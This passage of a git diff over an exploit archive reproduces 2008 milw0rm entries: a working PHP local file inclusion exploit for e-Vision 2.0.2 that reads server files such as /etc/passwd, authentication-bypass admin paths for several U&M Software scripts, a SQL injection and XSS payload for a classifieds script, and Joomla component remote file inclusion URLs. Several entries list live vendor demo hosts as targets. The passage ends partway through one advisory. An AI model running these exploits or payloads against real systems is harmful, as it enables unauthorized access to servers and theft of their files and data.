-    if(preg_match('/http://(.+?)$/',$argv[1]) or empty($argv[1]))
-    {
-      echo "[+] e-Vision <= 2.0.2 Multiple Local File Inclusion Exploit\r\n";
-      echo "[+] by athos\r\n";
-      echo "    -----------------------------------------------------------\r\n";
-      echo "[+] Usage: php $argv[0] [host/path] [mode]\r\n";
-      echo "[+] Usage: php $argv[0] [host/path] [save]\r\n";
-      echo "[+] Usage: php $argv[0] [host/path]        \r\n";
-      exit;
-    }
-  }
-  
-  function exploiting($host,$mode)
-  {
-    $host = explode('/',$host);
-    $i = 0;
-    
-    
-    echo "[+] Local File (ex: ../../etc/passwd%00)\r\n";
-    echo "[+] Local File: ";
-    $file = stripslashes(trim(fgets(STDIN)));
-    
-    if(empty($file)) die("you fail");
-    
-    $array = array (
-                    "3rdparty/adminpart/add3rdparty.php?module=$file",
-                    "polling/adminpart/addpolling.php?module=$file",
-                    "contact/adminpart/addcontact.php?module=$file",
-                    "brandnews/adminpart/addbrandnews.php?module=$file",
-                    "newsletter/adminpart/addnewsletter.php?module=$file",
-                    "game/adminpart/addgame.php?module=$file",
-                    "tour/adminpart/addtour.php?module=$file",
-                    "articles/adminpart/addarticles.php?module=$file",
-                    "product/adminpart/addproduct.php?module=$file",
-                    "plain/adminpart/addplain.php?module=$file",
-                  ); 
-                  
-    if($i > 9)
-    {
-      $write .= "GET /$host[1]/admin/ind_ex.php HTTP/1.1\r\n";
-      $write .= "Host: $host[0]\r\n";
-      $write .= "User-Agent: doesntexist\r\n";
-      $write .= "Cookie: adminlang=$file; path=/admin\r\n";
-      $write .= "Connection: close\r\n\r\n";
-    }
-    else
-    {
-
-      $write .= "GET /$host[1]/modules/$array[$i] HTTP/1.1\r\n";
-      $write .= "Host: $host[0]\r\n";
-      $write .= "User-Agent: you are lost\r\n";
-      $write .= "Connection: close\r\n\r\n";
-    }
-    
-    if(stristr($this->http_request($host[0],$write),'No such file or directory in'))
-    {
-      $i++;
-    }
-    else
-    {
-      if($mode == "save") 
-      {
-        $rand = rand(0,99999);
-        fclose(fwrite(fopen(getcwd().'/'.$rand.'.txt',"a+"),$this->http_request($host[0],$write)));
-        
-        echo "[+] File $rand Saved Successfully!\r\n";
-        echo "[+] Exploit Terminated!\r\n";
-        exit;
-      }
-      else
-      {
-        echo $this->http_request($host[0],$write);
-        exit;
-      }
-    }
-  }
-}
-  
-  
-// StAkeR - StAkeR[at]hotmail[dot]it
-// Note: if you add on msn i don't accept!       
-// Greetz "er biondo"
-
-# milw0rm.com [2008-11-07]
+starting();
+$exploit->is_vulnerable($domain);
+$exploit->exploiting($domain,$mymode);
+
+ 
+
+class Exploit
+{
+  function http_request($host,$data) 
+  {   
+   
+    if(!$socket = socket_create(AF_INET,SOCK_STREAM,SOL_TCP)) 
+    {
+       echo "socket_create() error!\r\n";
+       exit;
+    }
+    if(!socket_set_option($socket,SOL_SOCKET,SO_BROADCAST,1))
+    { 
+      echo "socket_set_option() error!\r\n";
+      exit;
+    }
+    
+    if(!socket_connect($socket,$host,80))
+    {
+      echo "socket_connect() error!\r\n";
+      exit;
+    }
+    if(!socket_write($socket,$data,strlen($data)))
+    {
+      echo "socket_write() errror!\r\n";
+      exit;
+    }
+  
+    while($get = socket_read($socket,1024,PHP_NORMAL_READ)) 
+    { 
+      $content .= $get; 
+    }
+
+    socket_close($socket);
+  
+    $array = array(
+                 'HTTP/1.1 404 Not Found',
+                 'HTTP/1.1 300 Multiple Choices',
+                 'HTTP/1.1 301 Moved Permanently',
+                 'HTTP/1.1 302 Found',
+                 'HTTP/1.1 304 Not Modified',
+                 'HTTP/1.1 400 Bad Request',
+                 'HTTP/1.1 401 Unauthorized',
+                 'HTTP/1.1 402 Payment Required',
+                 'HTTP/1.1 403 Forbidden',
+                 'HTTP/1.1 405 Method Not Allowed',
+                 'HTTP/1.1 406 Not Acceptable',
+                 'HTTP/1.1 407 Proxy Authentication Required',
+                 'HTTP/1.1 408 Request Timeout',
+                 'HTTP/1.1 409 Conflict',
+                 'HTTP/1.1 410 Gone',
+                 'HTTP/1.1 411 Length Required',
+                 'HTTP/1.1 412 Precondition Failed',
+                 'HTTP/1.1 413 Request Entity Too Large',
+                 'HTTP/1.1 414 Request-URI Too Long',
+                 'HTTP/1.1 415 Unsupported Media Type',
+                 'HTTP/1.1 416 Request Range Not Satisfiable',
+                 'HTTP/1.1 417 Expectation Failed',
+                 'HTTP/1.1 Retry With',
+                );
+               
+    for($i=0;$i<=count($array);$i++)
+   
+    if(eregi($array[$i],$content)) 
+    {
+      return ("$array[$i]\r\n");
+      break;
+    } 
+    else 
+    {
+      return ("$content\r\n");
+      break;
+    }
+  }
+  
+  function is_vulnerable($host)
+  {
+    $host = explode('/',$host);
+    
+    $header .= "GET /$host[1]/modules/3rdparty/adminpart/add3rdparty.php?module=%27 HTTP/1.1\r\n";
+    $header .= "Host: $host[0]\r\n";
+    $header .= "User-Agent: athos~doesntexist\r\n";
+    $header .= "Connection: close\r\n\r\n";
+    
+    if(stristr($this->http_request($host[0],$header),"\\'"))
+    {  
+      echo "[+] Magic Quotes GPC On!\n";
+      echo "[+] Exploit Failed!\n";
+      exit;
+    }
+    else
+    {
+      return false;
+    }
+  }
+  
+  function starting()
+  {
+    global $argv;
+    
+    if(preg_match('/http://(.+?)$/',$argv[1]) or empty($argv[1]))
+    {
+      echo "[+] e-Vision <= 2.0.2 Multiple Local File Inclusion Exploit\r\n";
+      echo "[+] by athos\r\n";
+      echo "    -----------------------------------------------------------\r\n";
+      echo "[+] Usage: php $argv[0] [host/path] [mode]\r\n";
+      echo "[+] Usage: php $argv[0] [host/path] [save]\r\n";
+      echo "[+] Usage: php $argv[0] [host/path]        \r\n";
+      exit;
+    }
+  }
+  
+  function exploiting($host,$mode)
+  {
+    $host = explode('/',$host);
+    $i = 0;
+    
+    
+    echo "[+] Local File (ex: ../../etc/passwd%00)\r\n";
+    echo "[+] Local File: ";
+    $file = stripslashes(trim(fgets(STDIN)));
+    
+    if(empty($file)) die("you fail");
+    
+    $array = array (
+                    "3rdparty/adminpart/add3rdparty.php?module=$file",
+                    "polling/adminpart/addpolling.php?module=$file",
+                    "contact/adminpart/addcontact.php?module=$file",
+                    "brandnews/adminpart/addbrandnews.php?module=$file",
+                    "newsletter/adminpart/addnewsletter.php?module=$file",
+                    "game/adminpart/addgame.php?module=$file",
+                    "tour/adminpart/addtour.php?module=$file",
+                    "articles/adminpart/addarticles.php?module=$file",
+                    "product/adminpart/addproduct.php?module=$file",
+                    "plain/adminpart/addplain.php?module=$file",
+                  ); 
+                  
+    if($i > 9)
+    {
+      $write .= "GET /$host[1]/admin/ind_ex.php HTTP/1.1\r\n";
+      $write .= "Host: $host[0]\r\n";
+      $write .= "User-Agent: doesntexist\r\n";
+      $write .= "Cookie: adminlang=$file; path=/admin\r\n";
+      $write .= "Connection: close\r\n\r\n";
+    }
+    else
+    {
+
+      $write .= "GET /$host[1]/modules/$array[$i] HTTP/1.1\r\n";
+      $write .= "Host: $host[0]\r\n";
+      $write .= "User-Agent: you are lost\r\n";
+      $write .= "Connection: close\r\n\r\n";
+    }
+    
+    if(stristr($this->http_request($host[0],$write),'No such file or directory in'))
+    {
+      $i++;
+    }
+    else
+    {
+      if($mode == "save") 
+      {
+        $rand = rand(0,99999);
+        fclose(fwrite(fopen(getcwd().'/'.$rand.'.txt',"a+"),$this->http_request($host[0],$write)));
+        
+        echo "[+] File $rand Saved Successfully!\r\n";
+        echo "[+] Exploit Terminated!\r\n";
+        exit;
+      }
+      else
+      {
+        echo $this->http_request($host[0],$write);
+        exit;
+      }
+    }
+  }
+}
+  
+  
+// StAkeR - StAkeR[at]hotmail[dot]it
+// Note: if you add on msn i don't accept!       
+// Greetz "er biondo"
+
+# milw0rm.com [2008-11-07]
diff --git a/platforms/php/webapps/7032.txt b/platforms/php/webapps/7032.txt
index 4a23bb4a9..1c6777ce6 100755
--- a/platforms/php/webapps/7032.txt
+++ b/platforms/php/webapps/7032.txt
@@ -1,62 +1,62 @@
-==============================================================================
-                      _      _       _          _      _   _ 
-                     / \    | |     | |        / \    | | | |
-                    / _ \   | |     | |       / _ \   | |_| |
-                   / ___ \  | |___  | |___   / ___ \  |  _  |
-   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
-                                                             
-
-==============================================================================
-                      ____   _  _     _   _    ___    _  __
-                     / ___| | || |   | \ | |  / _ \  | |/ /
-                    | |  _  | || |_  |  \| | | | | | | ' / 
-                    | |_| | |__   _| | |\  | | |_| | | . \ 
-                     \____|    |_|   |_| \_|  \___/  |_|\_\
-
-==============================================================================
-	U&M Software Signup v1.1 Auth Bypass Vulnerability
-==============================================================================
-
-	[»] Script:             [ U&M Software Signup v1.0 ]
-	[»] Language:           [ PHP ]
-	[»] Website:            [ http://www.hotscripts.com/Detailed/65722.html ]
-	[»] Type:               [ Commercial ]
-	[»] Report-Date:        [ 06.11.2008 ]
-	[»] Founder:            [ G4N0K  ]
-
-
-===[ XPL ]===
-
-	[!] Use one of these paths to bypass admin login ;)
-	
-	[»] http://localhost/[path]/admin/adminstart.php
-	[»] http://localhost/[path]/admin/admineventtype.php
-	[»] http://localhost/[path]/admin/admineventdetails.php
-	[»] http://localhost/[path]/admin/admineventlist.php
-	[»] http://localhost/[path]/admin/adminuserslist.php
-	[»] http://localhost/[path]/admin/adminleaderslist.php
-	[»] http://localhost/[path]/admin/admindatabase.php
-	
-
-
-===[ LIVE ]===
-
-	[»] http://www.signup.uochm.com/software/admin/index.php
-	[»] http://www.signup.uochm.com/software/admin/adminstart.php
-
-
-	
-===[ Greetz ]===
-
-	[»] ALLAH
-	[»] Tornado2800 
-	[»] Hussain-X 
-
-	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
-	//ALLAH,forgimme...
-
-===============================================================================
-exit(); //EoX
-===============================================================================
-
-# milw0rm.com [2008-11-07]
+==============================================================================
+                      _      _       _          _      _   _ 
+                     / \    | |     | |        / \    | | | |
+                    / _ \   | |     | |       / _ \   | |_| |
+                   / ___ \  | |___  | |___   / ___ \  |  _  |
+   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
+                                                             
+
+==============================================================================
+                      ____   _  _     _   _    ___    _  __
+                     / ___| | || |   | \ | |  / _ \  | |/ /
+                    | |  _  | || |_  |  \| | | | | | | ' / 
+                    | |_| | |__   _| | |\  | | |_| | | . \ 
+                     \____|    |_|   |_| \_|  \___/  |_|\_\
+
+==============================================================================
+	U&M Software Signup v1.1 Auth Bypass Vulnerability
+==============================================================================
+
+	[»] Script:             [ U&M Software Signup v1.0 ]
+	[»] Language:           [ PHP ]
+	[»] Website:            [ http://www.hotscripts.com/Detailed/65722.html ]
+	[»] Type:               [ Commercial ]
+	[»] Report-Date:        [ 06.11.2008 ]
+	[»] Founder:            [ G4N0K  ]
+
+
+===[ XPL ]===
+
+	[!] Use one of these paths to bypass admin login ;)
+	
+	[»] http://localhost/[path]/admin/adminstart.php
+	[»] http://localhost/[path]/admin/admineventtype.php
+	[»] http://localhost/[path]/admin/admineventdetails.php
+	[»] http://localhost/[path]/admin/admineventlist.php
+	[»] http://localhost/[path]/admin/adminuserslist.php
+	[»] http://localhost/[path]/admin/adminleaderslist.php
+	[»] http://localhost/[path]/admin/admindatabase.php
+	
+
+
+===[ LIVE ]===
+
+	[»] http://www.signup.uochm.com/software/admin/index.php
+	[»] http://www.signup.uochm.com/software/admin/adminstart.php
+
+
+	
+===[ Greetz ]===
+
+	[»] ALLAH
+	[»] Tornado2800 
+	[»] Hussain-X 
+
+	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
+	//ALLAH,forgimme...
+
+===============================================================================
+exit(); //EoX
+===============================================================================
+
+# milw0rm.com [2008-11-07]
diff --git a/platforms/php/webapps/7033.txt b/platforms/php/webapps/7033.txt
index ecea33421..12720300d 100755
--- a/platforms/php/webapps/7033.txt
+++ b/platforms/php/webapps/7033.txt
@@ -1,61 +1,61 @@
-==============================================================================
-                      _      _       _          _      _   _ 
-                     / \    | |     | |        / \    | | | |
-                    / _ \   | |     | |       / _ \   | |_| |
-                   / ___ \  | |___  | |___   / ___ \  |  _  |
-   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
-                                                             
-
-==============================================================================
-                      ____   _  _     _   _    ___    _  __
-                     / ___| | || |   | \ | |  / _ \  | |/ /
-                    | |  _  | || |_  |  \| | | | | | | ' / 
-                    | |_| | |__   _| | |\  | | |_| | | . \ 
-                     \____|    |_|   |_| \_|  \___/  |_|\_\
-
-==============================================================================
-	U&M Software JustBookIt v1.0 Auth Bypass Vulnerability
-==============================================================================
-
-	[»] Script:             [ U&M Software JustBookIt v1.0 ]
-	[»] Language:           [ PHP ]
-	[»] Website:            [ http://www.hotscripts.com/Detailed/79959.html ]
-	[»] Type:               [ Commercial ]
-	[»] Report-Date:        [ 06.11.2008 ]
-	[»] Founder:            [ G4N0K  ]
-
-
-===[ XPL ]===
-
-	[!] Use one of these paths to bypass admin login ;)
-	
-	[»] http://localhost/[path]/admin/user_manual.php
-	[»] http://localhost/[path]/admin/user_config.php
-	[»] http://localhost/[path]/admin/user_kundnamn.php
-	[»] http://localhost/[path]/admin/user_kundlista.php
-	[»] http://localhost/[path]/admin/user_aktiva_kunder.php
-	[»] http://localhost/[path]/admin/database.php
-	
-
-
-===[ LIVE ]===
-
-	[»] http://www.justbookit.uochm.com/demo/admin/index.php
-	[»] http://www.justbookit.uochm.com/demo/admin/user_config.php
-
-
-	
-===[ Greetz ]===
-
-	[»] ALLAH
-	[»] Tornado2800 
-	[»] Hussain-X 
-
-	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
-	//ALLAH,forgimme...
-
-===============================================================================
-exit(); //EoX
-===============================================================================
-
-# milw0rm.com [2008-11-07]
+==============================================================================
+                      _      _       _          _      _   _ 
+                     / \    | |     | |        / \    | | | |
+                    / _ \   | |     | |       / _ \   | |_| |
+                   / ___ \  | |___  | |___   / ___ \  |  _  |
+   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
+                                                             
+
+==============================================================================
+                      ____   _  _     _   _    ___    _  __
+                     / ___| | || |   | \ | |  / _ \  | |/ /
+                    | |  _  | || |_  |  \| | | | | | | ' / 
+                    | |_| | |__   _| | |\  | | |_| | | . \ 
+                     \____|    |_|   |_| \_|  \___/  |_|\_\
+
+==============================================================================
+	U&M Software JustBookIt v1.0 Auth Bypass Vulnerability
+==============================================================================
+
+	[»] Script:             [ U&M Software JustBookIt v1.0 ]
+	[»] Language:           [ PHP ]
+	[»] Website:            [ http://www.hotscripts.com/Detailed/79959.html ]
+	[»] Type:               [ Commercial ]
+	[»] Report-Date:        [ 06.11.2008 ]
+	[»] Founder:            [ G4N0K  ]
+
+
+===[ XPL ]===
+
+	[!] Use one of these paths to bypass admin login ;)
+	
+	[»] http://localhost/[path]/admin/user_manual.php
+	[»] http://localhost/[path]/admin/user_config.php
+	[»] http://localhost/[path]/admin/user_kundnamn.php
+	[»] http://localhost/[path]/admin/user_kundlista.php
+	[»] http://localhost/[path]/admin/user_aktiva_kunder.php
+	[»] http://localhost/[path]/admin/database.php
+	
+
+
+===[ LIVE ]===
+
+	[»] http://www.justbookit.uochm.com/demo/admin/index.php
+	[»] http://www.justbookit.uochm.com/demo/admin/user_config.php
+
+
+	
+===[ Greetz ]===
+
+	[»] ALLAH
+	[»] Tornado2800 
+	[»] Hussain-X 
+
+	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
+	//ALLAH,forgimme...
+
+===============================================================================
+exit(); //EoX
+===============================================================================
+
+# milw0rm.com [2008-11-07]
diff --git a/platforms/php/webapps/7034.txt b/platforms/php/webapps/7034.txt
index 304f9b337..e39204939 100755
--- a/platforms/php/webapps/7034.txt
+++ b/platforms/php/webapps/7034.txt
@@ -1,63 +1,63 @@
-==============================================================================
-                      _      _       _          _      _   _ 
-                     / \    | |     | |        / \    | | | |
-                    / _ \   | |     | |       / _ \   | |_| |
-                   / ___ \  | |___  | |___   / ___ \  |  _  |
-   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
-                                                             
-
-==============================================================================
-                      ____   _  _     _   _    ___    _  __
-                     / ___| | || |   | \ | |  / _ \  | |/ /
-                    | |  _  | || |_  |  \| | | | | | | ' / 
-                    | |_| | |__   _| | |\  | | |_| | | . \ 
-                     \____|    |_|   |_| \_|  \___/  |_|\_\
-
-==============================================================================
-	U&M Software Event Lister v1.0 Auth Bypass Vulnerability
-==============================================================================
-
-	[»] Script:             [ U&M Software Event Lister v1.0 ]
-	[»] Language:           [ PHP ]
-	[»] Website:            [ http://www.hotscripts.com/Detailed/84735.html ]
-	[»] Type:               [ Commercial ]
-	[»] Report-Date:        [ 06.11.2008 ]
-	[»] Founder:            [ G4N0K  ]
-
-
-===[ XPL ]===
-	
-	[!] Use one of these paths to bypass admin login ;)
-	
-	[»] http://localhost/[path]/admin/start.php
-	[»] http://localhost/[path]/admin/aktivitet.php
-	[»] http://localhost/[path]/admin/prop_aktivitet.php
-	[»] http://localhost/[path]/admin/kategorier.php
-	[»] http://localhost/[path]/admin/konfig.php
-	[»] http://localhost/[path]/admin/security.php
-	[»] http://localhost/[path]/admin/manual.php
-
-	
-	
-
-===[ LIVE ]===
-
-	[»] http://www.justlistit.uochm.com/demo/admin/start.php
-	[»]	http://www.justlistit.uochm.com/demo/admin/index.php
-
-
-	
-===[ Greetz ]===
-
-	[»] ALLAH
-	[»] Tornado2800 
-	[»] Hussain-X 
-
-	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
-	//ALLAH,forgimme...
-
-===============================================================================
-exit(); //EoX
-===============================================================================
-
-# milw0rm.com [2008-11-07]
+==============================================================================
+                      _      _       _          _      _   _ 
+                     / \    | |     | |        / \    | | | |
+                    / _ \   | |     | |       / _ \   | |_| |
+                   / ___ \  | |___  | |___   / ___ \  |  _  |
+   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
+                                                             
+
+==============================================================================
+                      ____   _  _     _   _    ___    _  __
+                     / ___| | || |   | \ | |  / _ \  | |/ /
+                    | |  _  | || |_  |  \| | | | | | | ' / 
+                    | |_| | |__   _| | |\  | | |_| | | . \ 
+                     \____|    |_|   |_| \_|  \___/  |_|\_\
+
+==============================================================================
+	U&M Software Event Lister v1.0 Auth Bypass Vulnerability
+==============================================================================
+
+	[»] Script:             [ U&M Software Event Lister v1.0 ]
+	[»] Language:           [ PHP ]
+	[»] Website:            [ http://www.hotscripts.com/Detailed/84735.html ]
+	[»] Type:               [ Commercial ]
+	[»] Report-Date:        [ 06.11.2008 ]
+	[»] Founder:            [ G4N0K  ]
+
+
+===[ XPL ]===
+	
+	[!] Use one of these paths to bypass admin login ;)
+	
+	[»] http://localhost/[path]/admin/start.php
+	[»] http://localhost/[path]/admin/aktivitet.php
+	[»] http://localhost/[path]/admin/prop_aktivitet.php
+	[»] http://localhost/[path]/admin/kategorier.php
+	[»] http://localhost/[path]/admin/konfig.php
+	[»] http://localhost/[path]/admin/security.php
+	[»] http://localhost/[path]/admin/manual.php
+
+	
+	
+
+===[ LIVE ]===
+
+	[»] http://www.justlistit.uochm.com/demo/admin/start.php
+	[»]	http://www.justlistit.uochm.com/demo/admin/index.php
+
+
+	
+===[ Greetz ]===
+
+	[»] ALLAH
+	[»] Tornado2800 
+	[»] Hussain-X 
+
+	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
+	//ALLAH,forgimme...
+
+===============================================================================
+exit(); //EoX
+===============================================================================
+
+# milw0rm.com [2008-11-07]
diff --git a/platforms/php/webapps/7035.txt b/platforms/php/webapps/7035.txt
index eb1b91634..fea55b012 100755
--- a/platforms/php/webapps/7035.txt
+++ b/platforms/php/webapps/7035.txt
@@ -1,37 +1,37 @@
-##################################################################
-#
-#   Author: TR-ShaRk
-#
-######################
-#
-#   Web   : StarHack.Us OldKral.Com
-#
-######################
-#
-#   Emai   : Admin@tr-shark.org
-#
-######################
-#
-#   Script : Local Classifieds Turnkeyforms
-#
-######################
-#
-#   SQL Injection Vuln. :
-#
-#   listtest.php?r=-39+union+select+1,@@version--
-#
-#   Xss:
-#
-#   listtest.php?r=">
-#
-######################
-#
-#   Demo:
-#
-#
-# http://demo.turnkeyforms.com/localclassifieds/listtest.php?r=">
-# http://demo.turnkeyforms.com/localclassifieds/listtest.php?r=-39+union+select+1,@@version--
-#
-######################
-
-# milw0rm.com [2008-11-07]
+##################################################################
+#
+#   Author: TR-ShaRk
+#
+######################
+#
+#   Web   : StarHack.Us OldKral.Com
+#
+######################
+#
+#   Emai   : Admin@tr-shark.org
+#
+######################
+#
+#   Script : Local Classifieds Turnkeyforms
+#
+######################
+#
+#   SQL Injection Vuln. :
+#
+#   listtest.php?r=-39+union+select+1,@@version--
+#
+#   Xss:
+#
+#   listtest.php?r=">
+#
+######################
+#
+#   Demo:
+#
+#
+# http://demo.turnkeyforms.com/localclassifieds/listtest.php?r=">
+# http://demo.turnkeyforms.com/localclassifieds/listtest.php?r=-39+union+select+1,@@version--
+#
+######################
+
+# milw0rm.com [2008-11-07]
diff --git a/platforms/php/webapps/7038.txt b/platforms/php/webapps/7038.txt
index 72696955b..243fa117a 100755
--- a/platforms/php/webapps/7038.txt
+++ b/platforms/php/webapps/7038.txt
@@ -1,73 +1,73 @@
-=========================================================================================================================================================
-
-
-  [o] Clickheat - Heatmap stats for Joomla! 1.0.1 Multiple Remote File Inclusion Vulnerabilities
-
-       Software : com_clickheat version 1.0.1
-       Vendor   : http://www.recly.com/
-       Download : http://www.recly.com/index.php?option=com_recly&task=product_page&id=1
-       Author   : NoGe
-       Contact  : noge[dot]code[at]gmail[dot]com
-       Blog     : http://evilc0de.blogspot.com
-
-
-=========================================================================================================================================================
-
-
-  [o] Vulnerable file
-
-       administrator/components/com_clickheat/install.clickheat.php
-
-        require_once($GLOBALS['mosConfig_absolute_path']. '/administrator/components/com_clickheat/Recly_Config.php');
-
-       administrator/components/com_clickheat/includes/heatmap/_main.php
-
-        require_once( $mosConfig_absolute_path . '/components/Recly/Clickheat/Clickheat_Heatmap.php' );
-
-       administrator/components/com_clickheat/includes/heatmap/main.php
-
-        require_once( $mosConfig_absolute_path . '/components/Recly/Clickheat/Clickheat_Heatmap.php' );
-
-       administrator/components/com_clickheat/includes/overview/main.php
-
-        require_once( $mosConfig_absolute_path . '/components/Recly/Clickheat/Clickheat_Overview.php' );
-
-       administrator/components/com_clickheat/Recly/Clickheat/Cache.php
-
-        require_once( $GLOBALS['mosConfig_absolute_path'] . '/components/Recly/common/Logger.php');
-
-       administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php
-
-        require_once( $GLOBALS['mosConfig_absolute_path'] . '/components/Recly/common/Logger.php');
-
-       administrator/components/com_clickheat/Recly/common/GlobalVariables.php
-
-        require_once($GLOBALS['mosConfig_absolute_path'].'/components/Recly/common/String.php');
-
-
-
-  [o] Exploit
-
-       http://localhost/[path]/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
-       http://localhost/[path]/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=[evilcode]
-       http://localhost/[path]/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=[evilcode]
-       http://localhost/[path]/administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=[evilcode]
-       http://localhost/[path]/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
-       http://localhost/[path]/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
-       http://localhost/[path]/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
-
-
-=========================================================================================================================================================
-
-
-  [o] Greetz
-
-       MainHack BrotherHood [ http://serverisdown.org/blog/]
-       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
-       H312Y yooogy mousekill }^-^{ kaka11  martfella
-       skulmatic olibekas ulga Cungkee k1tk4t str0ke
-
-        
-=========================================================================================================================================================
-
-# milw0rm.com [2008-11-07]
+=========================================================================================================================================================
+
+
+  [o] Clickheat - Heatmap stats for Joomla! 1.0.1 Multiple Remote File Inclusion Vulnerabilities
+
+       Software : com_clickheat version 1.0.1
+       Vendor   : http://www.recly.com/
+       Download : http://www.recly.com/index.php?option=com_recly&task=product_page&id=1
+       Author   : NoGe
+       Contact  : noge[dot]code[at]gmail[dot]com
+       Blog     : http://evilc0de.blogspot.com
+
+
+=========================================================================================================================================================
+
+
+  [o] Vulnerable file
+
+       administrator/components/com_clickheat/install.clickheat.php
+
+        require_once($GLOBALS['mosConfig_absolute_path']. '/administrator/components/com_clickheat/Recly_Config.php');
+
+       administrator/components/com_clickheat/includes/heatmap/_main.php
+
+        require_once( $mosConfig_absolute_path . '/components/Recly/Clickheat/Clickheat_Heatmap.php' );
+
+       administrator/components/com_clickheat/includes/heatmap/main.php
+
+        require_once( $mosConfig_absolute_path . '/components/Recly/Clickheat/Clickheat_Heatmap.php' );
+
+       administrator/components/com_clickheat/includes/overview/main.php
+
+        require_once( $mosConfig_absolute_path . '/components/Recly/Clickheat/Clickheat_Overview.php' );
+
+       administrator/components/com_clickheat/Recly/Clickheat/Cache.php
+
+        require_once( $GLOBALS['mosConfig_absolute_path'] . '/components/Recly/common/Logger.php');
+
+       administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php
+
+        require_once( $GLOBALS['mosConfig_absolute_path'] . '/components/Recly/common/Logger.php');
+
+       administrator/components/com_clickheat/Recly/common/GlobalVariables.php
+
+        require_once($GLOBALS['mosConfig_absolute_path'].'/components/Recly/common/String.php');
+
+
+
+  [o] Exploit
+
+       http://localhost/[path]/administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
+       http://localhost/[path]/administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=[evilcode]
+       http://localhost/[path]/administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=[evilcode]
+       http://localhost/[path]/administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=[evilcode]
+       http://localhost/[path]/administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
+       http://localhost/[path]/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
+       http://localhost/[path]/administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
+
+
+=========================================================================================================================================================
+
+
+  [o] Greetz
+
+       MainHack BrotherHood [ http://serverisdown.org/blog/]
+       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
+       H312Y yooogy mousekill }^-^{ kaka11  martfella
+       skulmatic olibekas ulga Cungkee k1tk4t str0ke
+
+        
+=========================================================================================================================================================
+
+# milw0rm.com [2008-11-07]
diff --git a/platforms/php/webapps/7039.txt b/platforms/php/webapps/7039.txt
index cad5f766f..e73b274c3 100755
--- a/platforms/php/webapps/7039.txt
+++ b/platforms/php/webapps/7039.txt
@@ -1,53 +1,53 @@
-=============================================================================================================================================================
-
-
-  [o] Recly!Competitions Component 1.0.0 Multiple Remote File Inclusion Vulnerability
-
-       Software : com_competitions version 1.0.0
-       Vendor   : http://www.recly.com/
-       Download : http://www.recly.com/index.php?option=com_recly&task=product_page&id=12
-       Author   : NoGe
-       Contact  : noge[dot]code[at]gmail[dot]com
-       Blog     : http://evilc0de.blogspot.com
-
-
-=============================================================================================================================================================
-
-
-  [o] Vulnerable file
-
-       administrator/components/com_competitions/includes/competitions/add.php
-
-        require_once($GLOBALS['mosConfig_absolute_path'] . '/components/com_competitions/lib/common/GlobalVariables.class.php');
-
-       administrator/components/com_competitions/includes/competitions/competitions.php
-
-        require_once( $GLOBALS['mosConfig_absolute_path'] . '/administrator/includes/pageNavigation.php' );
-
-       administrator/components/com_competitions/includes/settings/settings.php
-
-        require_once($mosConfig_absolute_path.'/components/com_competitions/lib/common/String.class.php');
-
-
-
-  [o] Exploit
-
-       http://localhost/[path]/administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
-       http://localhost/[path]/administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
-       http://localhost/[path]/administrator/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path=[evilcode]
-
-
-=============================================================================================================================================================
-
-
-  [o] Greetz
-
-       MainHack BrotherHood [ http://serverisdown.org/blog/]
-       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
-       H312Y yooogy mousekill }^-^{ kaka11  martfella
-       skulmatic olibekas ulga Cungkee k1tk4t str0ke
-
-        
-=============================================================================================================================================================
-
-# milw0rm.com [2008-11-07]
+=============================================================================================================================================================
+
+
+  [o] Recly!Competitions Component 1.0.0 Multiple Remote File Inclusion Vulnerability
+
+       Software : com_competitions version 1.0.0
+       Vendor   : http://www.recly.com/
+       Download : http://www.recly.com/index.php?option=com_recly&task=product_page&id=12
+       Author   : NoGe
+       Contact  : noge[dot]code[at]gmail[dot]com
+       Blog     : http://evilc0de.blogspot.com
+
+
+=============================================================================================================================================================
+
+
+  [o] Vulnerable file
+
+       administrator/components/com_competitions/includes/competitions/add.php
+
